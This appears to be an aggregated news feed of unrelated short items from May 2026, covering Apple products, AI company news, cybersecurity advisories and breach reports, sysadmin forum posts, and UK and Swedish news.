Rumors suggest Apple plans to expand Apple-designed modems to the entire iPhone 18 lineup, ending support for Qualcomm modems. The transition will bring speed and efficiency improvements, along with a little-known privacy benefit. In iOS 26.3, Apple added a Limit Precise Location setting that cuts down on the amount of location data that's available to mobile networks, improving user privacy. Mobile networks determine your location using information from cellular towers that a device connects to, but with Limit Precise Location enabled, some of the data typically provided to mobile networks is restricted. Instead of seeing location down to a street address, carriers may be limited to the neighborhood where a device is located. The problem is that this feature is currently only available on devices with an Apple-designed C1 or C1X modem, which includes the iPhone Air, iPhone 16e, iPhone 17e, and M5 iPad Pro. Devices with Qualcomm modems like the iPhone 17 Pro models do not have the Limit Precise Location setting. With the iPhone 18 Pro models and the iPhone Fold expected to use Apple modem technology, this is likely a privacy option that is set to expand to the full iPhone lineup. Reducing location precision does not impact signal quality or user experience, nor does it affect the precision of location data provided to emergency responders during an emergency call. It is only meant to limit the location data given to cellular carriers, and it is distinct from location data shared with apps through Location Services. While Apple's next set of iPhones will all likely have the new privacy feature, carriers do have to implement support. So far there are a limited number of carriers that have added the feature, but if it expands to the entire iPhone lineup and there is customer demand, it could see more widespread adoption. In the United States, only Boost Mobile supports limiting precise location data, but EE, BT, and Sky all support it in the UK. Carriers in Austria, Germany, Denmark, Ireland, and Thailand have also adopted support, with a list available on Apple's website. The C2 modem that Apple is rumored to be working on is more capable than the C1 or C1X, and it will offer similar performance to Qualcomm's newest modems. It is expected to support mmWave 5G, which is not a feature of the C1 or C1X.Related Roundups: iPhone 18, iPhone 18 Pro, iPhone FoldRelated Forum: iPhoneThis article, "Apple's iPhone 18 Modem Switch Comes With a Quiet Privacy Benefit" first appeared on MacRumors.comDiscuss this article in our forums

Apple's iPad that's just an ‌iPad‌ with no Air or Pro attached is its most appealing tablet because of the affordable starting $349 price tag, but if you've been thinking about buying one, you should wait. Apple refreshed the ‌iPad‌ in March 2025, so it's over a year old. That's reason enough not to buy when there's a new model on the horizon, but this year, there's even more to lose by purchasing now. The 2025 ‌iPad‌ has an A16 chip inside that does not support Apple Intelligence. It does not have features like Writing Tools, Image Playground, Clean Up, Live Translation, notification summaries, Smart Reply, Priority Messages in Mail, Visual Intelligence, and multiple other AI-related tools. ‌Apple Intelligence‌ is still new so it might not sound like a big deal to miss out on those capabilities, but not having access to it is going to become more of a problem as Apple continues implementing new AI features. Rumors suggest there are big changes coming in iOS 27. Siri is going to get smarter and turn into a full chatbot, the Camera app is going to get ‌Visual Intelligence‌ integration, the Photos app will have AI image editing tools, Shortcuts may be more automated, and there are probably features coming that haven't even been rumored yet. The A16 ‌iPad‌ will likely feel outdated in the next year or two because of the feature set it won't have access to. The next ‌iPad‌ is likely to get the A18 chip, and the A18 does support ‌Apple Intelligence‌. It will have faster performance, more RAM, and most importantly, future-proofing and access to the AI features that Apple is investing in. Holding out for the next ‌iPad‌ will take some patience, because right now, we don't know when it's coming. Updating the ‌iPad‌ alongside the low-cost iPhone 17e would have made sense, but that didn't happen. A new entry-level ‌iPad‌ isn't coming in the first half of 2026, so we're likely going to be waiting until September or October. Bloomberg's Mark Gurman said in March that an updated low-cost iPad is "ready to go" and "still coming this year." Even though the wait may be several months, we think it's worth holding out for the next ‌iPad‌ instead of buying now because of the upgrade that comes with ‌Apple Intelligence‌ support.Related Roundup: iPadBuyer's Guide: iPad (Don't Buy)Related Forum: iPadThis article, "It's a Bad Time to Buy the Low-Cost iPad" first appeared on MacRumors.comDiscuss this article in our forums

Chris Sutton takes on indie band Blossoms and rapper Songer plus the BBC readers and AI with his predictions for the FA Cup final and this weekend's Premier League fixtures.

A Russian state-sponsored hacking group known as Sandworm has been caught making a calculated pivot from compromised IT networks into operational technology systems that control physical infrastructure. The campaign is alarming because it does not rely on cutting-edge exploits. Instead, Sandworm walks through doors that were already left open, turning unresolved vulnerabilities into launchpads for […] The post Sandworm Hackers Pivot From Compromised IT Systems Toward Critical OT Assets appeared first on Cyber Security News.

OpenAI is going to let users access Codex, its desktop AI tool that can write code and use apps on your computer, from the ChatGPT app on your phone. Following the surge in popularity for Anthropic's Claude Code, OpenAI has been working quickly to try and catch up, including by cutting back on "side quests," […]

Cisco is warning that a critical Catalyst SD-WAN Controller authentication bypass flaw, tracked as CVE-2026-20182, was actively exploited in zero-day attacks that allowed attackers to gain administrative privileges on compromised devices. [...]

Article URL: https://router.start9.com/ Comments URL: https://news.ycombinator.com/item?id=48140541 Points: 120 # Comments: 58

Article URL: https://openai.com/index/work-with-codex-from-anywhere/ Comments URL: https://news.ycombinator.com/item?id=48140529 Points: 319 # Comments: 159

Limits Claude subscriptions to interactive use

A Chinese state-linked hacking group known as FamousSparrow has quietly infiltrated an Azerbaijani oil and gas company, exploiting an unpatched Microsoft Exchange server to plant multiple backdoors inside the network. The attack ran from late December 2025 through late February 2026 and stands as one of the most detailed Chinese APT intrusions targeting energy infrastructure […] The post Chinese APT Hackers Exploit Microsoft Exchange to Breach Energy Sector Network appeared first on Cyber Security News.

A Bitcoin holder reportedly recovered 5 BTC worth nearly $400,000 with the help of Anthropic's Claude. According to X user cprkrn, they changed their wallet password while "stoned" and forgot it, unable to regain access for more than 11 years. Tom's Hardware reports: After finding a mnemonic that actually turned out to be their old password a few weeks ago, the user dumped their entire college computer files in Claude in a last-gasp effort. The bot uncovered an old backup wallet file that it successfully decrypted, while also uncovering a bug in the password configuration that was preventing recovery up to that point. [...] It seems that the user already had some candidate passwords and multiple wallets stored on their PC. They'd been trying to brute-force their way into the locked file with btcrecover, an open-source Bitcoin wallet recovery tool, but to no success. Their luck changed for the better when they found an old mnemonic seed phrase written in an old college notebook. The HD addresses recovered by the seed phrase matched those of a specific file on their computer, confirming that it was the wallet that held the 5 BTC, but it remained encrypted. Out of frustration, cprkrn then dumped their whole college computer into Claude. This was when the AI discovered an older backup file of the wallet from December 2019 hidden in cprkrn's data. Claude also discovered an issue where the shared key and passwords that btcrecover was trying weren't combined properly. With the bug ironed out and an older wallet predating the password change, Claude successfully ran btcrecover and was able to decrypt the private keys, allowing cprkrn to transfer the five "lost" BTC to their current wallet. Read more of this story at Slashdot.

A tourist from Washington state is facing federal charges after a witness recorded what prosecutors say was a video of him hurling a coconut-sized rock at an endangered Hawaiian monk seal just off a Maui beach last week. Igor Mykhaylovych Lytvynchuk, 38, made arrangements to surrender in the Seattle area on Wednesday as special agents with the National Oceanic and Atmospheric Administration were seeking to arrest him, Assistant US Attorney Aislinn Affinito in Honolulu said. He is charged with...

Richard Socher's new $650 million startup wants to build an AI that can research and improve itself indefinitely — and he insists it will actually ship products.

Cloud-based school management and collaboration platform targeting educational institutes in India, covering online fee payments, exam management, online admissions, teacher-parent communication, and e-learning continuity.

Lesson one for aspiring dark web kingpins: don't have your laundered gold bars shipped to your home address. Read more in my article on the Hot for Security blog.

If you’ve been curious about Ray-Ban’s Meta smart glasses, right now they’re on sale in Meta’s biggest deal event outside Black Friday. As part of the company’s Summer Sale event, which runs through May 26th, the original model is on sale starting at $224.25 ($74 off) at Amazon, Best Buy, and directly from Meta, matching […]

Andy Burnham targets Westminster return & Wes Streeting resigns

People confide almost everything to their phones.

Town’s 49,000 California residents compete with Nevada data centers for energy.

OverviewOn May 13, 2026, Palo Alto Networks published a security advisory for CVE-2026-0265, a signature verification vulnerability that facilitates authentication bypass on PAN-OS, the operating system that most Palo Alto Networks firewalls run. This vulnerability allows a remote unauthenticated attacker with network access to bypass authentication when Cloud Authentication Service (CAS) is enabled and attached to a login interface; the vulnerable configuration is non-default but common. CVE-2026-0265 affects PAN-OS on PA-Series and VM-Series firewalls, as well as Panorama (virtual and M-Series) appliances. Cloud NGFW and Prisma Access are not affected.Palo Alto Networks assigned CVE-2026-0265 a “High” 7.2 CVSS score. The advisory states that the vulnerability’s severity scoring depends on interface exposure; according to the vendor, risk is highest for unrestricted management interfaces equipped with CAS, while other login portals, such as GlobalProtect gateways, are lower risk. However, the researcher who reported the vulnerability, Harsh Jaiswal of HacktronAI, publicly disputed the vendor’s severity rating. Jaiswal stated on social media that the vulnerability advisory misrepresents the criticality of the bug and the affected components; according to the HacktronAI research team, they successfully exploited CVE-2026-0265 to bypass authentication controls on multiple corporations’ GlobalProtect portals and establish VPN access. Jaiswal stated that internet-facing components are affected, and HacktronAI plans to disclose full technical details the week of May 18.As of May 14, Palo Alto Networks has not confirmed exploitation in-the-wild of CVE-2026-0265, and there is no public proof-of-concept exploit available. However, given the researcher's statements about the practical exploitability of this vulnerability and the pending disclosure of technical details, this will likely evolve. PAN-OS software has been a frequent target for threat actors; on May 6, 2026, the PAN-OS vulnerability CVE-2026-0300 was added to CISA's Known Exploited Vulnerabilities (KEV) catalog. Patches for many affected version streams were published on May 13, and the remaining patches are expected on May 28, 2026.Mitigation guidanceOrganizations running PA-Series or VM-Series firewalls, or Panorama (virtual and M-Series) appliances, with Cloud Authentication Service (CAS) enabled should upgrade to a fixed version on an emergency basis. Patches are partially available, with many version stream fixes published on May 13 and additional version stream coverage expected on May 28. The following table outlines the affected and fixed versions:PAN-OS versionAffectedFixed12.1< 12.1.4-h5< 12.1.7>= 12.1.4-h5>= 12.1.7 (ETA: 05/28)11.2< 11.2.4-h17< 11.2.7-h13< 11.2.10-h6< 11.2.12>= 11.2.4-h17 (ETA: 05/28)>= 11.2.7-h13>= 11.2.10-h6>= 11.2.12 (ETA: 05/28)11.1< 11.1.4-h33< 11.1.6-h32< 11.1.7-h6< 11.1.10-h25< 11.1.13-h5< 11.1.15>= 11.1.4-h33>= 11.1.6-h32>= 11.1.7-h6 (ETA: 05/28)>= 11.1.10-h25>= 11.1.13-h5>= 11.1.15 (ETA: 05/28)10.2< 10.2.7-h34< 10.2.10-h36< 10.2.13-h21< 10.2.16-h7< 10.2.18-h6>= 10.2.7-h34 (ETA: 05/28)>= 10.2.10-h36>= 10.2.13-h21 (ETA: 05/28)>= 10.2.16-h7 (ETA: 05/28)>= 10.2.18-h6Cloud NGFWNot affectedN/APrisma AccessNot affectedN/AOlder unsupported PAN-OS versions should be upgraded to a supported fixed version.To determine if an environment is vulnerable, the official advisory provides instructions to verify whether an authentication profile using CAS is enabled and attached to a login interface. Due to discrepancies in the information shared by the vendor and reporting researchers, Rapid7 advises patching instead of implementing workarounds, wherever possible.For the latest official mitigation guidance, please refer to the vendor advisory.Rapid7 customersExposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0265 with authenticated checks expected to be available in the May 15th content release.UpdatesMay 14, 2026: Initial publication.

OpenAI is so frustrated with Apple over a ChatGPT integration that failed to deliver the subscribers and prominence it expected that the company is now actively exploring legal action against the iPhone maker.

OpenAI says two employees' devices were breached in the recent TanStack supply chain attack that impacted hundreds of npm and PyPI packages, causing the company to rotate code-signing certificates for its applications as a precaution. [...]

A new open source gadget called Clawdmeter turns Claude Code usage stats into a tiny desktop dashboard for AI coding power users.

An anonymous reader quotes a report from The Independent: Princeton University will soon require exams to be supervised for the first time in 100 years -- all thanks to students using artificial intelligence to cheat. For 133 years, the Ivy League school's honor code allowed students to take exams without a professor present, but on Monday, faculty voted to require proctoring for all in-person exams starting this summer. A "significant" number of undergraduate students and faculty requested the change, "given their perception that cheating on in-class exams has become widespread," the college's dean, Michael Gordin, wrote in a letter, according to The Wall Street Journal. Princeton's honor system dates back to 1893, when students petitioned to eliminate proctors -- or an impartial person to supervise students -- during examinations, according to the school's newspaper, The Daily Princetonian. The honor code has long been a point of pride for Princeton. However, artificial intelligence and cellphones have made it easier for students to cheat -- and even harder for others to spot, Gordin wrote. Despite the changes to the policy, Princeton will still require students to state: "I pledge my honor that I have not violated the Honor Code during this examination," according to the Journal. Students are also more reluctant to report cheating, according to the policy proposal. Students are more likely now to anonymously report cheating due to fears of "doxxing or shaming among their peer groups" online, the proposal says, according to the school newspaper. Under the new guidelines, instructors will be present during exams to act "as a witness to what happens," but are instructed not to interfere with students. If a suspected honor code infraction occurs, they will report it to a student-run honor committee for adjudication. Read more of this story at Slashdot.

Short-form video is built for mobile, so it may seem counterintuitive, but it's true: YouTube Shorts are becoming quite popular on the big screen.

The head of US Border Patrol, the agency tasked with securing the nation’s frontiers and increasingly tapped by the Trump administration for immigration operations in American cities, announced his resignation on Thursday. Michael Banks’ decision, announced in a Fox News interview and later confirmed by the Department of Homeland Security, was the latest leadership shake-up of officials implementing President Donald Trump’s immigration crackdown and came as the Republican administration appeared...

FSR 4.1 running on RDNA3 or RDNA2 GPUs may take a bigger performance hit.

I Storbritannien har den populäre politikern Andy Burnham kommit ett steg närmare att kunna utmana premiärminster Keir Starmer om makten.Burnham som idag är borgmästare i Manchester kommer få ställa upp i ett fyllnadsval till parlamentet, skriver flera brittiska medier. Om han vinner det valet, har han möjlighet att utmana Starmer om partiledarposten - en utmaning som många tror att han skulle vinna.

On the first day of Pwn2Own Berlin 2026, security researchers collected $523,000 in cash awards after exploiting 24 unique zero-days. [...]

Ina Österlind nätade i Alingsås KIK:s förlust Alingsås Tidning

TSMC has been the exclusive supplier of Apple's systems-on-a-chip since 2016, but that 10-year streak could be nearing its end. Apple supply chain analyst Ming-Chi Kuo today said that Intel has "kicked off" small-scale testing of lower-end iPhone, iPad, and Mac chip fabrication, with production expected to ramp up throughout 2027 and 2028. Kuo did not indicate exactly which of Apple's A-series and/or M-series chips would be manufactured by Intel. Apple is utilizing Intel's 18A process for these chips, and it is evaluating Intel's other advanced-node technologies, according to Kuo. By sourcing chips from two suppliers, Apple can negotiate lower costs and bolster supply. In this case, Apple rekindling a partnership with Intel could win it favor with the Trump administration, which wants more U.S. manufacturing. However, Kuo said Taiwan's TSMC will remain responsible for more than 90% of Apple's chip supply. There is no indication that Intel would play a role in designing the iPhone chips, with its involvement expected to be strictly limited to fabrication. That would differ from the era of Intel Macs, which used Intel-designed processors with x86 architecture. Apple began transitioning away from Intel processors in Macs in 2020. All in all, these would be Apple-designed chips manufactured by Intel in the U.S., for use in some lower-end iPhone, iPad, and Mac models. Apple's potential return to Intel has been reported by numerous sources by this point, but an official announcement has still yet to be made.Tags: Intel, Ming-Chi KuoThis article, "Report: Intel is Testing Production of Some iPhone, iPad, and Mac Chips" first appeared on MacRumors.comDiscuss this article in our forums

Last year, accessory maker Nimble came out with the Wally Stretch power adapters, and they've become some of my favorite charging options. The Wally Stretch is available in 35W and 65W options, and it has an excellent design. It's a simple cube with prongs that fold down, a retractable USB-C cable, and an extra USB-C port. The 65W model that I tested is thicker than the comparable 70W Apple charger, but it's smaller in length and width. Nimble's charger is just about two inches all around, and it looks like a block. While Nimble sells the 35W charger in black and the 65W charger in white, Apple offers 65W Wally Stretch in better colors. It comes in teal with a yellow accent and a gold-topped cable, along with deep purple with a pink accent and a silver-topped cable. I'm a big fan of any charger that's not your standard black or white, and I use the Wally Stretch chargers with my desktop power strip. The retractable USB-C cable measures in at two feet, which is a great length for desktop use. It's also worked well for traveling between locations, and two feet seems to be an all-around useful length. Some people prefer much longer cables, and there aren't options with the Wally, which is a downside. There is, however, an extra USB-C port at the bottom where a longer cable can be plugged in if desired. 65W is enough for me to power even a 16-inch MacBook Pro when it's not under heavy load, and it's more than sufficient for my MacBook Air, iPad Pro, and iPhone. Even when charging two of the latter three devices at the same time, I get fast charging. A retractable cable paired with an extra USB-C port all in a small package makes the Wally Stretch one of my most flexible power adapters. I would pick it over a standard Apple charger in all situations, and over many third-party chargers. The only situation where I reach for something else is when I need more than two ports or higher watts, but that doesn't happen too often. I think the only thing that would make the Wally Stretch better is an XL version with two retractable cables and 140W. Nimble also makes power banks that I like a lot, again because they come in colors other than your standard black or white. The Nimble 10k Champ Portable Charger I tested is teal with yellow accents, and it has some design elements I've found useful. It's small, and it tucks nicely into a pocket or a bag. It has a lanyard, which is a feature that I find surprisingly useful for a power bank. I can always track it down in my backpack, and I can put it around my wrist when I'm charging my iPhone with a short cable. I wouldn't have thought a lanyard would make a difference, but I have a decent selection of power banks, and I always pick the ones with the lanyard first when I need one. The Nimble Champ is 3.4 inches long, 2.3 inches wide, and under an inch thick, plus it's lightweight at six ounces. There's a yellow button on the front that can be pressed to see remaining power level, which is reflected via four LED dots. That's standard for power banks, and it's fine. Some power banks have a little LED display that shows exact level, and I do prefer the more exact readout, but it's not a make-or-break feature. There are two USB-C ports for charging an iOS device or for charging the power bank, and while it does come with an included USB-C cable, I wish it was a color-matched cable instead of a plain cable. A power bank designed to stand out with a bright color should have a cable that goes along with it, but I do understand the plain cable choice because it keeps costs lower. Nimble's power bank is $60, which makes it reasonably priced. I have an Anker Nano power bank with a lanyard and a retractable cable and it is the one that I love the most. Nimble Champ is my second pick, just because I like integrated cables that don't require me to hunt down a cable and that don't result in excess cable I don't need. Nimble does actually have an updated version with a retractable cable and an exact readout of charging capacity, but it's more expensive at $80. This is a 10K power bank, so it has enough power to charge an iPhone 17 Pro Max from 0 to 100 and then some, but it is limited to 20W fast charging. Apple's iPhone 17 models charge to 50 percent in 20 minutes with a 40W adapter, so you're not going to get maximum charging speeds with the Nimble Champ. I probably wouldn't choose the Nimble Champ in a situation where you need to optimize for the fastest possible charging for an ‌iPhone 17‌, but it's great if charging that's a bit slower isn't an issue. Bottom Line Nimble's Wally is a useful power adapter for everything from the Mac to the iPhone, and the retractable cable is super convenient. I'd definitely recommend it to anyone looking for a power adapter for desktop or travel use. The Nimble Champ is a budget-friendly power bank that's brightly colored and slim enough to carry in a pocket. It's a good pick as long as you don't need the fastest USB-C charging. How to Buy Nimble's 65W Wally Chargers can be purchased from the Nimble website for $42, but you can get the colorful versions from Apple for $60. The 10K Nimble Champ Charger is $60 from Nimble or from Apple.This article, "Nimble Wally Stretch Review: A Colorful Charger With a Retractable USB-C Cable" first appeared on MacRumors.comDiscuss this article in our forums

Trump admin wants to let Musk pay $1.5M fine to settle $150 million Twitter suit.

The survivors spent about five hours on a life raft before being rescued by the US Air Force off Florida's coast.

A newly uncovered malware framework is raising serious alarms across the cybersecurity community. Researchers have identified a previously unknown implant called TencShell, a sophisticated tool capable of giving attackers full remote control over a compromised system. The discovery highlights how threat actors are quietly repurposing publicly available offensive tools to carry out targeted intrusions with […] The post New Malware Framework Enables Screen Control, Browser Artifact Access, and UAC Bypass appeared first on Cyber Security News.

It's not entirely clear how the exploit works. Microsoft says it's investigating.

The Princess of Wales shone in front of large crowds in Reggio Emilia on the final day of her tour.

Article URL: https://blog.calif.io/p/first-public-kernel-memory-corruption Comments URL: https://news.ycombinator.com/item?id=48139219 Points: 353 # Comments: 79

Article URL: https://jpain.io/god-damn-ai-is-making-me-dumb/ Comments URL: https://news.ycombinator.com/item?id=48139148 Points: 482 # Comments: 286

Anybody manage to get YellowKey working for them? We're testing our machines against all the latest vulnerabilities, and I just cannot get this one to work. It boots into the command prompt, but when I check the C: drive it says that "This drive is locked by BitLocker Drive Encryption." CopyFail on Linux was so easy, and even Dirty Frag worked. We managed to run BitUnlocker (then applied mitigations!), but YellowKey does nothing. Any ideas, gng? Maybe we're just safe? Edit1: Confirmed working on a standalone machine, newly installed Windows 11 25H2, with BitLocker manually enabled (recovery key saved to file). Initiated restart from the sign in screen. submitted by /u/jobunocru [link] [comments]

The Reform UK leader, who is facing a Commons standards probe, said he "cannot be bought by anybody".

This annoys me to no end. My boss takes time off and she still schedules calls and attends the meetings. Go away and go do something! submitted by /u/Illnasty2 [link] [comments]

We have put together stories from our coverage of Xi and Trump’s meeting in Beijing. If you would like to see more of our reporting, please consider subscribing. 1. Thucydides Trap, personal touches – all you need to know from Xi-Trump summit so far The two leaders began the day with an extravagant welcome on the steps of the Great Hall of the People before heading in for talks. 2. After fanfare and banquet, day 1 of Trump’s China visit draws to a close Xi and Trump are expected to discuss the...

Longtime Slashdot reader schwit1 shares a report from CNBC: The U.S. has cleared around 10 Chinese firms to buy Nvidia's second-most powerful AI chip, the H200, but not a single delivery has been made so far, three people familiar with the matter said, leaving a major technology deal in limbo as CEO Jensen Huang seeks a breakthrough in China this week. [...] Before U.S. export curbs tightened, Nvidia commanded about 95% of China's advanced chip market. China once accounted for 13% of its revenue, and Huang has previously estimated the country's AI market alone would be worth $50 billion this year. The U.S. Commerce Department has approved around 10 Chinese companies including Alibaba, Tencent, ByteDance and JD.com to purchase Nvidia's H200 chips, according to the sources, who spoke on condition of anonymity due to the sensitivity of the matter. A handful of distributors including Lenovo and Foxconn have also been approved, they said. Buyers are permitted to purchase either directly from Nvidia or through those intermediaries and each approved customer can purchase up to 75,000 chips under the U.S. licensing terms, two of them said. Despite U.S. approval, deals have stalled, as Chinese firms pulled back after guidance from Beijing, one source said. The shift in China was partly triggered by changes on the U.S. side, though exactly what changed remains unclear, the person added. In Beijing, pressure is mounting to block or tightly vet the orders, a separate fourth source said. Commerce Secretary Howard Lutnick echoed that view, telling a Senate hearing last month that "the Chinese central government has not let them, as of yet, buy the chips, because they're trying to keep their investment focused on their own domestic industry." Read more of this story at Slashdot.

The Greater Manchester mayor is lining up a third attempt to be Labour leader - but must get back to Westminster first.

Gautam Adani and his nephew Sagar agreed to pay a total of US$18 million to settle Securities and Exchange Commission allegations they made false and misleading representations about Adani Green Energy. Gautam Adani would pay US$6 million and Sagar would pay US$12 million to end the SEC’s November 2024 lawsuit, under the proposed agreement filed in federal court on Thursday, which still needs a judge’s approval. Gautam Adani and Sagar agreed to the “payment of a civil penalty” totalling US$18...

Kina har kommit överens med USA om att köpa 200 flygplan av Boeing, uppger president Donald Trump.

Nu kommer det nya varningar för extremhettan under herrarnas fotbolls-VM som startar om knappt en månad. I ett öppet brev på brittiska BBC varnar forskare om faror med hettan.Forskare tror inte att de extra tre minuters pauser som Fifa har infört hjälper. Man ska ta varningen på allvar och den gäller både spelare och publik, säger Lykke Tamm, Svenska olympiska kommitténs medicinskt ansvarige läkare.

OpenAI is preparing to potentially take legal action against Apple due to a "strained" relationship with the iPhone maker, according to Bloomberg's Mark Gurman. The two companies reached a partnership in 2024 that saw ChatGPT integrated into features like Siri and Image Playground across iOS, iPadOS, and macOS. iPhone users can also subscribe to ChatGPT directly via the Settings app, with Apple taking a cut of revenue. Ultimately, though, the report said OpenAI expected ChatGPT to be more deeply integrated across additional Apple apps and to have more prime placement within Siri. OpenAI executives also believe that Apple has not sufficiently advertised the integration, resulting in fewer customers knowing about it. OpenAI initially believed the deal could generate billions of dollars per year in subscription revenue, but that "hasn't come close to happening." This expectation was seemingly set by Apple, which reportedly characterized the agreement as being an opportunity on par with its multi-billion-dollar deal with Google for search in Safari. Apple's culture of secrecy is said to have resulted in OpenAI not knowing exactly how ChatGPT would be integrated on the iPhone, iPad, and Mac. "They basically said, 'OpenAI needs to take a leap of faith and trust us,'" an unnamed OpenAI executive told Bloomberg. They described the deal as a "failure." "We have done everything from a product perspective," the executive said. "They have not, and worse, they haven't even made an honest effort." Siri users must use the word "ChatGPT" when speaking or typing a command in order to get results from OpenAI's chatbot. ChatGPT responses shown within the Siri interface also contain limited information compared to the ChatGPT app. OpenAI's attempts at renegotiating the deal have apparently stalled. As a result of the shortcomings, OpenAI is considering taking legal action against Apple, according to the report. OpenAI is said to be weighing a range of options, including sending Apple a letter alleging breach of contract, without necessarily filing a full lawsuit. However, OpenAI still hopes to resolve the issues outside of court. iOS 27 is expected to tap into other chatbots like Google's Gemini and Anthropic's Claude, but this is apparently not one of OpenAI's grievances, as its partnership with Apple was never meant to be exclusive. In fact, iOS 27's rumored Siri app with an "Extensions" feature for other chatbots actually might better promote ChatGPT. For now, though, it appears that OpenAI feels it received the short end of the stick.Tags: Bloomberg, ChatGPT, Mark Gurman, OpenAI, SiriThis article, "OpenAI Considering Legal Action Against Apple Over 'Strained' Siri Partnership" first appeared on MacRumors.comDiscuss this article in our forums

South Africa's Garrick Higgo receives a rare two-shot penalty at the start of his first round - for arriving a minute late to the tee - denying him a share of the US PGA Championship lead.

A UN judge admits the 84-year-old is "in the final stages of his life", but says prison conditions in The Hague ensure his maximum comfort.

Cisco has released updates to address a maximum-severity authentication bypass flaw in Catalyst SD-WAN Controller that it said has been exploited in limited attacks. The vulnerability, tracked as CVE-2026-20182, carries a CVSS score of 10.0. "A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly

En pojke i 15-årsåldern blev på torsdagskvällen nedslagen och sparkad av flera personer i Hässelby Villastad.

Fem italienska turister har omkommit i en dykolycka på Maldiverna. Gruppen skulle utforska grottor på 50 meters djup när olyckan inträffade. Det är ännu oklart hur olyckan gått till.

With today's KDE Plasma 6.7 beta release there has been a surprising amount of interest in the new revival of Plasma Big Screen as the TV-sized UI for Plasma. I've been trying it out today and it has worked out rather well, a very smooth experience, and in good shape for making its debut in next month's Plasma 6.7 release...

Eric Park tells us he doesn't plan to wear his modified cap to commencement, but his code's available for anyone with no such qualms and an upcoming ceremony

The nagatitan is the largest dinosaur found in South-East Asia and weighs as much as nine elephants.

Made-up therapy referrals, incorrect prescriptions among the common mistakes.

US President Donald Trump said Chinese President Xi Jinping offered to help broker an end to the Iran conflict and ensure freedom of navigation through the Strait of Hormuz, underscoring how Middle East tensions have become intertwined with a broader effort by Washington and Beijing to steady relations. In an interview with Fox News host Sean Hannity set to air on Thursday evening in the US, Trump said Xi had personally expressed willingness to assist amid mounting concerns over disruptions in...

How much attention did you pay to what happened in the world over the past seven days?

My manager expects me to take initiative and propose new things along with a standard of knowing the know how for a part of the job I'm pretty sure he should know I've never done before. He has experience with it and assumes that that part is familiar to everyone who works at the company. He applies pressure for things that are meant far enough into the future that we shouldn't even focus on them right now. As for the initiative, I guess there aren't that many things to actually think about improving them. One thing is the general lack of organization and communication in the company, but I don't think that's something that I should bear with as a Sys Admin. I'm rarely given a chance to fully express myself as people sure like to spin their stories and in this "market yourself" world there's really not an honest person that would even stop talking for a second to listen to the other person. Also, I'm pretty sure I'm sometimes given "helpful tips" copy/pasted straight from an AI chat along with being bombarded with information so far from my job decription that I have to listen to rants and other people being miserable. Got a performance review coming up and I don't know what to think. I know I do enough, because there isn't one outstanding task left. But somehow it feels it's never enough. If you made it this far, thanks for reading and have a good day! submitted by /u/AhYesTheSoldier [link] [comments]

I purchased one license of Windows 10 LTSC (yeah, I know, let's not talk about it) from a reseller who requested access to our M365 tenant to apply the license. There were two agreements, one to add them as a reseller and one to give them various permissions as part of GDAP. They were requesting Helpdesk Administrator, License Administrator, Cloud Application Administrator, Billing Administrator, Service Support Administrator, and Global Reader. That feels a little excessive. When I pushed back, they gave me a schpiel about it just being a wording thing by Microsoft and they don't actually receive those permissions. When I tested it, it looks like they actually receive that level of permission. Is this new? Is this common? Am I out-to-lunch thinking this is excessive? submitted by /u/TooManyRequests_429 [link] [comments]

Working on a school project around K-12 security awareness and KnowBe4 feels way too enterprise heavy for the context. Looking for something that actually changes behavior and not just gets people to click through a module to check a box. With platforms like Canvas recently getting caught up in phishing/security incidents, it feels like schools are becoming bigger targets and I’m not convinced checkbox-style training is enough anymore. Any alternatives you've tried and actually liked? submitted by /u/DonutFlimsy8993 [link] [comments]

Här är ett urval av händelserna i Västsverige under torsdagen den 14 maj.

Cybersecurity researchers are sounding the alarm about what has been described as "malicious activity" in newly published versions of node-ipc. According to Socket and StepSecurity, three different versions of the npm package have been confirmed as malicious - node-ipc@9.1.6 node-ipc@9.2.3 node-ipc@12.0.1 "Early analysis indicates that node-ipc@9.1.6, node-ipc@9.2.3, and node-ipc@12.0.1

Article URL: https://github.com/DepthFirstDisclosures/Nginx-Rift Comments URL: https://news.ycombinator.com/item?id=48138268 Points: 366 # Comments: 76

We're on KnowBe4 right now. Some users will not do the training, so the simulated phishing messages are probably providing more value. They're too predictable though. The fake Teams invites all look the same. Many claim to come from the HR team, or from IT, or from the CEO, but we're small enough that everyone knows who the HR person is. The hackers will at least grab real names from LinkedIn. Do you have to customize all your phishing templates? Are you seeing phishing messages that could fool you? submitted by /u/That_Fixed_It [link] [comments]

He quits as health secretary after days of speculation that he is preparing to launch a leadership challenge against Sir Keir Starmer.

Article URL: https://arkadiyt.com/2026/05/13/removing-the-modem-and-gps-from-my-rav4/ Comments URL: https://news.ycombinator.com/item?id=48138136 Points: 824 # Comments: 422

We wanted to let the Exchange Server community know that there are no security releases for any version of Exchange Server in May 2026, for customers with Exchange SE, or Exchange 2016 or 2019 ESU. Please keep upgrading your organizations to Exchange SE. Update 5/14/2026: While there is no security release (Security Update) in May 2026, please see our later blog post mentioning a mitigation for an Exchange Server CVE disclosed on May 14: Addressing Exchange Server May 2026 vulnerability CVE-2026-42897 | Microsoft Community Hub The Exchange Team

The three-wheel, two-seat EV has been in development since 2006.

Kuba står utan både olja och diesel, säger landets energiminister Vicente de la O Levy enligt Reuters. Uttalandet kommer efter flera månader av stoppade bränsleleveranser till den krisdrabbade ön.

Anthropic announced today that it is partnering with the Gates Foundation to "commit $200 million in grant funding, Claude usage credits, and technical support for programs in global health, life sciences, education, and economic mobility over the next four years." "This commitment is central to Anthropic's efforts to extend the benefits of AI in areas where markets alone will not," the company says. Reuters reports: One area of focus is language accessibility. AI systems have performed poorly in writing and translating dozens of African languages, so Anthropic and the foundation want to support better data collection and labeling that would be released publicly to help improve models across the industry, said Janet Zhou, a Gates Foundation director. Another area under consideration is releasing so-called knowledge graphs that could help AI systems better meet the needs of teachers in sub-Saharan Africa and India, Zhou said. The public-goods focus has come from "the needs of different partners and governments, including some of the fears that they may have around proprietary lock-in and sovereignty," Zhou said. One initiative will equip research centers to use Claude to predict drug candidates for treating HPV and preeclampsia, diseases that have been less commercially attractive for pharmaceutical companies to research, Zhou and Anthropic's Elizabeth Kelly said. Anthropic [...] is embracing the work to fulfill what Kelly described as its founding mission to benefit humanity. "This announcement is really core to who we are as a company," said Kelly, who leads Anthropic's beneficial deployments team. Read more of this story at Slashdot.

